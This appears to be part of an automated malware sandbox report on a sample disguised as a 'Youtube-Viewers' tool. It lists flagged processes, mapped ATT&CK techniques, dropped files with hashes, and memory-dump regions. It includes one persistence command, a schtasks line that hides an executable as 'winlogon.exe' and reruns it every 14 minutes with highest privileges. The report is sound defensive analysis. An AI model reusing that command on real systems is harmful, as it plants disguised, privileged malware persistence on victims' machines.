1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Saved Games\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4280

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ChainReview\EG6ATP28z0IboPcWhHfEXGTe81jh.bat
Filesize
90B

MD5
aa06dc21b6978c477a7f34b896dad471

SHA1
4b5f6bf59b40d386d741c9ba8bbd1c75b96e9d4c

SHA256
fc79f5fbfb63f69e761164ec2f0e180e9c601d9f1c7679c8b09a811bc954ac5b

SHA512
b502d2024f97aba1006440a3bd97c8b5578bf072d383e643471ff0737dafa9cd087ef8f1110dd517ca10342894d8b03c0393bf5aebd646a9a9d4f44a5326c86c

Download Submit
C:\ChainReview\OBg87LaDbDWQsMY7IUT23EbHgKkyJlfFMrfs5jJR.vbe
Filesize
217B

MD5
7b648db3dc8ebc6a5cd3a2f558dfe4de

SHA1
473ba67dce6b02a315ad1b7f3c7681139cf66bf3

SHA256
3d6edd167d26d72d3fa13028da5f7e7971dd1dc5c228cfa58f68dbbb8203f548

SHA512
01f3eaf4b996add5ec3840f8f336968272f4fc321348fd2d306923951d783a28ab867b179083670e5b755f1ef7110316b16f3851410d57ce955adb8c819abbf3

Download Submit
C:\ChainReview\ythyperRuntimedhcpSvc.exe
Filesize
2.0MB

MD5
9a6a6606ac872363a585b773f71d8f80

SHA1
62ea36005c549612d2402ab5d04f236ceca5f879

SHA256
d647eff6ef8a4eb95d66b2d86907b873e68199a5ad59ce091c9eefe9b26f9485

SHA512
616953d5386084eb926a445266e061c662a65ac64929085fdd237ee2bfeb19ee1fb879c84dbe11bd382c9f1f4aa54811736ffba6ff28aa6f2ef96cec41c9b038

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
2b373d672718c8c3d7e5cef04beccf2c

SHA1
d27442667d60c1b10832e0f602523581abf906a8

SHA256
7c8205211a32f154994ed53f15c88dc2070d7360df06f7d71764a8e98772e205

SHA512
77f4b6a819342d620b0994e5e9d9886081d6ae5996b2a749e73d158a3b3417ce269716a1a736e08a764da935eeb6abc1c58ea1a235f815e738c8c553bd92fd9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Temp\Leaf.xNet.dll
Filesize
129KB

MD5
ea87f37e78fb9af4bf805f6e958f68f4

SHA1
89662fed195d7b9d65ab7ba8605a3cd953f2b06a

SHA256
de9aea105f31f3541cbc5c460b0160d0689a2872d80748ca1456e6e223f0a4aa

SHA512
c56bd03142258c6dcb712d1352d2548a055fbb726ee200949d847cb2d23d9c52442b1435be0df0bf355701a2c1a3c47cd05b96972501f457d2d401501d33d83a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe
Filesize
33KB

MD5
a7878575f2e9f431c354c17a3e768fd9

SHA1
1824b6cb94120af47a0540af88bfc51435a4c20d

SHA256
375552e53a0c25aa36cd66827b97f7576177d1fa81efd978a55b2ec93a5b5fdd

SHA512
4f9de23fc13f414c8d6c82a7cd9ef5dfa2e7855ba642b745f62ad8b4af8dccd9269b4dec5468632af0ff5353b0d4c8e85f758ea794469f355f762cb1cc747019

Download Submit
C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe.config
Filesize
184B

MD5
cc46a0995713ba7cb577b4bbbedf83e8

SHA1
6cc50a0e444e33f65d42423195ed045a3a55daf8

SHA256
5fe1ad802f68d7c47dbbd8e60162ba88abaed162da5d381c85d3e4935311962e

SHA512
36f5b3acbc520504cfe56e5fe19de2a22ae3d2ddddb4c0eb3e441f884033077fb411e69976c3e250c3ef01189d0e48016bde67a73a0dbc950dd5d8ec7783fd2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xyhfeqif.otv.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\k0OYDjyvqU.bat
Filesize
169B

MD5
3c0e9afb95e2928eff825c3562f98087

SHA1
1bad3af08e666445c5362b1e9fa9489349d23521

SHA256
d5e8bd1bea16e62e286aaf7288bfe5d2aecf50e37c275a009899785e56c5f3ad

SHA512
ad127d2f20e73be64781942e1505f3fbe0bfe246bdebd12d0f1ec77cfec458dd42e88f8170a50193c86150eaeb90deb46e62243e455a8f74f91cc1005bab0259

Download Submit
C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe
Filesize
2.3MB

MD5
e99c78add813e602c300b492534ec0f7

SHA1
6fda2be6b06481e4284c6d38edc301d3a52d5a46

SHA256
fd58d5efc6e9d179c8419a154ecbdff007171e44ac1076bb075d50d208807d9e

SHA512
1dbe6f226aa2f0bd2f59852387a7ffacfbc18a3fb5fa5debe5106d1f91b5bde042bb070ccd34a471a56542ee76f16ac781dcc569999008ae81c5f8e2ffe65b9e

Download Submit
memory/404-98-0x0000000000C40000-0x0000000000C4E000-memory.dmp

Filesize
56KB

Download
memory/404-96-0x0000000000360000-0x0000000000566000-memory.dmp

Filesize
2.0MB

Download
memory/404-111-0x0000000002700000-0x000000000270E000-memory.dmp

Filesize
56KB

Download
memory/404-105-0x0000000000C50000-0x0000000000C5E000-memory.dmp

Filesize
56KB

Download
memory/404-103-0x00000000026D0000-0x00000000026E8000-memory.dmp

Filesize
96KB

Download
memory/404-101-0x0000000002750000-0x00000000027A0000-memory.dmp

Filesize
320KB

Download
memory/404-107-0x0000000002690000-0x000000000269E000-memory.dmp

Filesize
56KB

Download
memory/404-109-0x00000000026A0000-0x00000000026AC000-memory.dmp

Filesize
48KB

Download
memory/404-100-0x00000000026B0000-0x00000000026CC000-memory.dmp

Filesize
112KB

Download
memory/404-113-0x0000000002710000-0x000000000271C000-memory.dmp

Filesize
48KB

Download
memory/2336-129-0x000001E97FDB0000-0x000001E97FDD2000-memory.dmp

Filesize
136KB

Download
memory/2840-3-0x000000007FA70000-0x000000007FE41000-memory.dmp

Filesize
3.8MB

Download
memory/2840-2-0x0000000000400000-0x0000000000DDC000-memory.dmp

Filesize
9.9MB

Download
memory/2840-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

Filesize
3.8MB

Download
memory/2840-0-0x0000000000400000-0x0000000000DDC000-memory.dmp

Filesize
9.9MB

Download
memory/3624-22-0x00000000063E0000-0x00000000063FE000-memory.dmp

Filesize
120KB

Download
memory/3624-39-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/3624-46-0x0000000007960000-0x0000000007974000-memory.dmp

Filesize
80KB

Download
memory/3624-47-0x00000000079A0000-0x00000000079BA000-memory.dmp

Filesize
104KB

Download
memory/3624-48-0x0000000007990000-0x0000000007998000-memory.dmp

Filesize
32KB

Download
memory/3624-49-0x0000000007AB0000-0x0000000007AD2000-memory.dmp

Filesize
136KB

Download
memory/3624-50-0x0000000008990000-0x0000000008F34000-memory.dmp

Filesize
5.6MB

Download
memory/3624-44-0x0000000007910000-0x0000000007921000-memory.dmp

Filesize
68KB

Download
memory/3624-43-0x00000000079E0000-0x0000000007A76000-memory.dmp

Filesize
600KB

Download
memory/3624-42-0x0000000007790000-0x000000000779A000-memory.dmp

Filesize
40KB

Download
memory/3624-76-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/3624-41-0x0000000007720000-0x000000000773A000-memory.dmp

Filesize
104KB

Download
memory/3624-4-0x000000007478E000-0x000000007478F000-memory.dmp

Filesize
4KB

Download
memory/3624-5-0x0000000004DB0000-0x0000000004DE6000-memory.dmp

Filesize
216KB

Download
memory/3624-40-0x0000000007D60000-0x00000000083DA000-memory.dmp

Filesize
6.5MB

Download
memory/3624-45-0x0000000007950000-0x000000000795E000-memory.dmp

Filesize
56KB

Download
memory/3624-38-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/3624-37-0x00000000075D0000-0x0000000007673000-memory.dmp

Filesize
652KB

Download
memory/3624-36-0x0000000006A00000-0x0000000006A1E000-memory.dmp

Filesize
120KB

Download
memory/3624-25-0x00000000705A0000-0x00000000705EC000-memory.dmp

Filesize
304KB

Download
memory/3624-32-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/3624-24-0x00000000069C0000-0x00000000069F2000-memory.dmp

Filesize
200KB

Download
memory/3624-23-0x0000000006410000-0x000000000645C000-memory.dmp

Filesize
304KB

Download
memory/3624-21-0x0000000005D60000-0x00000000060B4000-memory.dmp

Filesize
3.3MB

Download
memory/3624-11-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/3624-10-0x0000000005C80000-0x0000000005CE6000-memory.dmp

Filesize
408KB

Download
memory/3624-9-0x00000000053A0000-0x00000000053C2000-memory.dmp

Filesize
136KB

Download
memory/3624-8-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/3624-6-0x0000000005460000-0x0000000005A88000-memory.dmp

Filesize
6.2MB

Download
memory/3624-7-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/4112-77-0x0000000000860000-0x000000000086E000-memory.dmp

Filesize
56KB

Download
memory/4112-81-0x0000000002AA0000-0x0000000002AC6000-memory.dmp

Filesize
152KB

Download